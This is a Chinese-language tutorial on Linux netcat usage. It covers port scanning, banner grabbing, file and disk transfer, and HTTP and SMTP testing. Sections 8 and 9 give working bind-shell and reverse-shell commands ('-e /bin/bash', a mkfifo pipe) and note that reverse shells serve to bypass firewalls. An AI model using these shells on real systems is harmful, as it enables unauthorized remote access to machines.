Linux nc命令用法收集

ps.ubuntu自带的nc是netcat-openbsd版,不带-c/-e参数。
pss.在线Markdown编辑器的bug是怎么回事...“#”号依然显示着

##参数

想要链接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待链接: nc -l port [-options] [hostname] [port]

• -g<网关>：设置路由器跃程通讯网关，最多设置8个;
• -G<指向器数目>：设置来源路由指向器，其数值为4的倍数;
• -h：在线帮助;
• -i<延迟秒数>：设置时间间隔，以便传送信息及扫描通讯端口;
• -l：使用监听模式，监控传入的资料;
• -n：直接使用ip地址，而不经过域名服务器;
• -o<输出文件>：指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存;
• -p<通讯端口>：设置本地主机使用的通讯端口;
• -r：指定源端口和目的端口都进行随机的选择;
• -s<来源位址>：设置本地主机送出数据包的IP地址;
• -u：使用UDP传输协议;
• -v：显示指令执行过程;
• -w<超时秒数>：设置等待连线的时间;
• -z：使用0输入/输出模式，只在扫描通讯端口时使用。

 

##用法

[A Server(192.168.1.1) B Client(192.168.1.2)]

####0.

链接到远程主机:

$nc -nvv 192.168.x.x 80

连到192.168.x.x的TCP80端口.

监听本地主机:

$nc -l 80

监听本机的TCP80端口.

超时控制:

多数状况咱们不但愿链接一直保持，那么咱们可使用 -w 参数来指定链接的空闲超时时间，该参数紧接一个数值，表明秒数，若是链接超过指定时间则链接会被终止。

Server

$nc -l 2389

Client

$ nc -w 10 localhost 2389

该链接将在 10 秒后中断。
注意: 不要在服务器端同时使用 -w 和 -l 参数，由于 -w 参数将在服务器端无效果。

####1.端口扫描

端口扫描常常被系统管理员和黑客用来发如今一些机器上开放的端口，帮助他们识别系统中的漏洞。

$nc -z -v -n 192.168.1.1 21-25

能够运行在TCP或者UDP模式，默认是TCP，-u参数调整为udp.
z 参数告诉netcat使用0 IO,链接成功后当即关闭链接， 不进行数据交换.
v 参数指详细输出.
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名.
以上命令会打印21到25 全部开放的端口。

$nc -v 127.0.0.1 22 localhost [127.0.0.1] 22 (ssh) open SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4

"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4"为Banner信息。Banner是一个文本，Banner是一个你链接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候，Banner信息是很是有用的。可是，并非全部的服务都会发送banner.一旦你发现开放的端口，你能够容易的使用netcat 链接服务抓取他们的banner。

####2.Chat Server

假如你想和你的朋友聊聊，有不少的软件和信息服务能够供你使用。可是，若是你没有这么奢侈的配置，好比你在计算机实验室，全部的对外的链接都是被限制的，你怎样和成天坐在隔壁房间的朋友沟通那？不要郁闷了，netcat提供了这样一种方法，你只须要建立一个Chat服务器，一个预先肯定好的端口，这样子他就能够联系到你了。

Server

$nc -l 20000

netcat 命令在20000端口启动了一个tcp 服务器，全部的标准输出和输入会输出到该端口。输出和输入都在此shell中展现。

Client

$nc 192.168.1.1 20000

无论你在机器B上键入什么都会出如今机器A上。

####3.文件传输

大部分时间中，咱们都在试图经过网络或者其余工具传输文件。有不少种方法，好比FTP,SCP,SMB等等，可是当你只是须要临时或者一次传输文件，真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设，你想要传一个文件file.txt 从A 到B。A或者B均可以做为服务器或者客户端.

Server

$nc -l 20000 < file.txt

Client

$nc -n 192.168.1.1 20000 > file.txt

这里咱们建立了一个服务器在A上而且重定向netcat的输入为文件file.txt，那么当任何成功链接到该端口，netcat会发送file的文件内容。
在客户端咱们重定向输出到file.txt，当B链接到A，A发送文件内容，B保存文件内容到file.txt.
没有必要建立文件源做为Server，咱们也能够相反的方法使用。像下面的咱们发送文件从B到A，可是服务器建立在A上，此次咱们仅须要重定向netcat的输出而且重定向B的输入文件。
B做为Server

Server

$nc -l 20000 > file.txt

Client

$nc 192.168.1.2 20000 < file.txt

 

####4.目录传输

发送一个文件很简单，可是若是咱们想要发送多个文件，或者整个目录，同样很简单，只须要使用压缩工具tar，压缩后发送压缩包。
若是你想要经过网络传输一个目录从A到B。

Server

$tar -cvf – dir_name | nc -l 20000

Client

$nc -n 192.168.1.1 20000 | tar -xvf -

这里在A服务器上，咱们建立一个tar归档包而且经过-在控制台重定向它，而后使用管道，重定向给netcat，netcat能够经过网络发送它。
在客户端咱们下载该压缩包经过netcat 管道而后打开文件。
若是想要节省带宽传输压缩包，咱们可使用bzip2或者其余工具压缩。

Server

$tar -cvf – dir_name| bzip2 -z | nc -l 20000

经过bzip2压缩

Client

$nc -n 192.168.1.1 20000 | bzip2 -d |tar -xvf -

 

####5. 加密你经过网络发送的数据

若是你担忧你在网络上发送数据的安全，你能够在发送你的数据以前用如mcrypt的工具加密。

Server

$nc localhost 20000 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

使用mcrypt工具加密数据。

Client

$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 20000

使用mcrypt工具解密数据。
以上两个命令会提示须要密码，确保两端使用相同的密码。
这里咱们是使用mcrypt用来加密，使用其它任意加密工具均可以。

####6.流视频

虽然不是生成流视频的最好方法，但若是服务器上没有特定的工具，使用netcat，咱们仍然有但愿作成这件事。

Server

$cat video.avi | nc -l 20000

这里咱们只是从一个视频文件中读入并重定向输出到netcat客户端

Client

$nc 192.168.1.1 20000 | mplayer -vo x11 -cache 3000 -

这里咱们从socket中读入数据并重定向到mplayer。

####7，克隆一个设备

若是你已经安装配置一台Linux机器而且须要重复一样的操做对其余的机器，而你不想在重复配置一遍。不在须要重复配置安装的过程，只启动另外一台机器的一些引导能够随身碟和克隆你的机器。
克隆Linux PC很简单，假如你的系统在磁盘/dev/sda上

Server

$dd if=/dev/sda | nc -l 20000

Client

$nc -n 192.168.1.1 20000 | dd of=/dev/sda

dd是一个从磁盘读取原始数据的工具，我经过netcat服务器重定向它的输出流到其余机器而且写入到磁盘中，它会随着分区表拷贝全部的信息。可是若是咱们已经作过度区而且只须要克隆root分区，咱们能够根据咱们系统root分区的位置，更改sda 为sda1，sda2.等等。

####8.打开一个shell

咱们已经用过远程shell-使用telnet和ssh，可是若是这两个命令没有安装而且咱们没有权限安装他们，咱们也可使用netcat建立远程shell。
假设你的netcat支持 -c -e 参数(原生 netcat)

Server

$nc -l 20000 -e /bin/bash -i

Client

$nc 192.168.1.1 20000

这里咱们已经建立了一个netcat服务器而且表示当它链接成功时执行/bin/bash
假如netcat 不支持-c 或者 -e 参数（openbsd netcat）,咱们仍然可以建立远程shell

Server

$mkfifo /tmp/tmp_fifo $cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo

这里咱们建立了一个fifo文件，而后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出，而后管道到netcat 运行的端口20000上。至此，咱们已经把netcat的输出重定向到fifo文件中。
说明：
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件而且其内容发送给sh命令
sh命令进程受到输入并把它写回到netcat。
netcat 经过网络发送输出到client
至于为何会成功是由于管道使命令平行执行，fifo文件用来替代正常文件，由于fifo使读取等待而若是是一个普通文件，cat命令会尽快结束并开始读取空文件。
在客户端仅仅简单链接到服务器

Client

$nc -n 192.168.1.1 20000

你会获得一个shell提示符在客户端

####9.反向shell

反向shell是指在客户端打开的shell。反向shell这样命名是由于不一样于其余配置，这里服务器使用的是由客户提供的服务。

Server

$nc -l 20000

在客户端，简单地告诉netcat在链接完成后，执行shell。

Client

$nc 192.168.1.1 20000 -e /bin/bash

如今，什么是反向shell的特别之处呢
反向shell常常被用来绕过防火墙的限制，如阻止入站链接。例如，我有一个专用IP地址为192.168.1.1，我使用代理服务器链接到外部网络。若是我想从网络外部访问 这台机器如1.2.3.4的shell，那么我会用反向外壳用于这一目的。

####10.指定源端口

假设你的防火墙过滤除25端口外其它全部端口，你须要使用-p选项指定源端口。

Server

$nc -l 20000

Client

$nc 192.168.1.1 20000 25

使用1024之内的端口须要root权限。
该命令将在客户端开启25端口用于通信，不然将使用随机端口。

####11.指定源地址

假设你的机器有多个地址，但愿明确指定使用哪一个地址用于外部数据通信。咱们能够在netcat中使用-s选项指定ip地址。

Server

$nc -u -l 20000 < file.txt

Client

$nc -u 192.168.1.1 20000 -s 172.31.100.5 > file.txt

该命令将绑定地址172.31.100.5。

####12.静态web页面服务器

新建一个网页,命名为somepage.html;
新建一个shell script:

while true; do nc -l 80 -q 1 < somepage.html; done

用root权限执行，而后在浏览器中输入127.0.0.1打开看看是否正确运行。
nc 指令一般都是給管理者進行除錯或測試等動做用的，因此若是只是單純须要臨時的網頁伺服器，使用 Python 的 SimpleHTTPServer 模組會比較方便。

####13.模拟HTTP Headers

$nc www.huanxiangwu.com 80 GET / HTTP/1.1 Host: ispconfig.org Referrer: mypage.com User-Agent: my-browser HTTP/1.1 200 OK Date: Tue, 16 Dec 2008 07:23:24 GMT Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8 Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/ Expires: 0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Cache-Control: private, post-check=0, pre-check=0, max-age=0 Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/ Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html [......]

在nc命令后，输入红色部分的内容，而后按两次回车，便可从对方得到HTTP Headers内容。

####13.Netcat支持IPv6

netcat 的 -4 和 -6 参数用来指定 IP 地址类型，分别是 IPv4 和 IPv6：

Server

$ nc -4 -l 2389

Client

$ nc -4 localhost 2389

而后咱们可使用 netstat 命令来查看网络的状况：

$ netstat | grep 2389 tcp 0 0 localhost:2389 localhost:50851 ESTABLISHED tcp 0 0 localhost:50851 localhost:2389 ESTABLISHED

接下来咱们看看IPv6 的状况：

Server

$ nc -6 -l 2389

Client

$ nc -6 localhost 2389

再次运行 netstat 命令：

$ netstat | grep 2389 tcp6 0 0 localhost:2389 localhost:33234 ESTABLISHED tcp6 0 0 localhost:33234 localhost:2389 ESTABLISHED

前缀是 tcp6 表示使用的是 IPv6 的地址。

####14.在 Netcat 中禁止从标准输入中读取数据

该功能使用 -d 参数，请看下面例子：

Server

$ nc -l 2389

Client

$ nc -d localhost 2389 Hi

你输入的 Hi 文本并不会送到服务器端。

####15.强制 Netcat 服务器端保持启动状态

若是链接到服务器的客户端断开链接，那么服务器端也会跟着退出。

Server

$ nc -l 2389

Client

$ nc localhost 2389 ^C

Server

$ nc -l 2389 $

上述例子中，但客户端断开时服务器端也当即退出。
咱们能够经过 -k 参数来控制让服务器不会由于客户端的断开链接而退出。

Server

$ nc -k -l 2389

Client

$ nc localhost 2389 ^C

Server

$ nc -k -l 2389

 

####16.配置 Netcat 客户端不会由于 EOF 而退出

Netcat 客户端能够经过 -q 参数来控制接收到 EOF 后隔多长时间才退出，该参数的单位是秒：

Client

$nc  -q 5 localhost 2389

如今若是客户端接收到 EOF ，它将等待 5 秒后退出。

####17.手動使用 SMTP 協定寄信

在測試郵件伺服器是否正常時，可使用這樣的方式手動寄送 Email：

$nc localhost 25 << EOF HELO host.example.com MAIL FROM: <user@host.example.com> RCPT TO: <user2@host.example.com> DATA Body of email. . QUIT EOF

 

####18.透過代理伺服器（Proxy）連線

這指令會使用 10.2.3.4:8080 這個代理伺服器，連線至 host.example.com 的42端口。

$nc -x10.2.3.4:8080 -Xconnect host.example.com 42

 

####19.使用 Unix Domain Socket

這行指令會创建一個 Unix Domain Socket，並接收資料：

$nc -lU /var/tmp/dsocket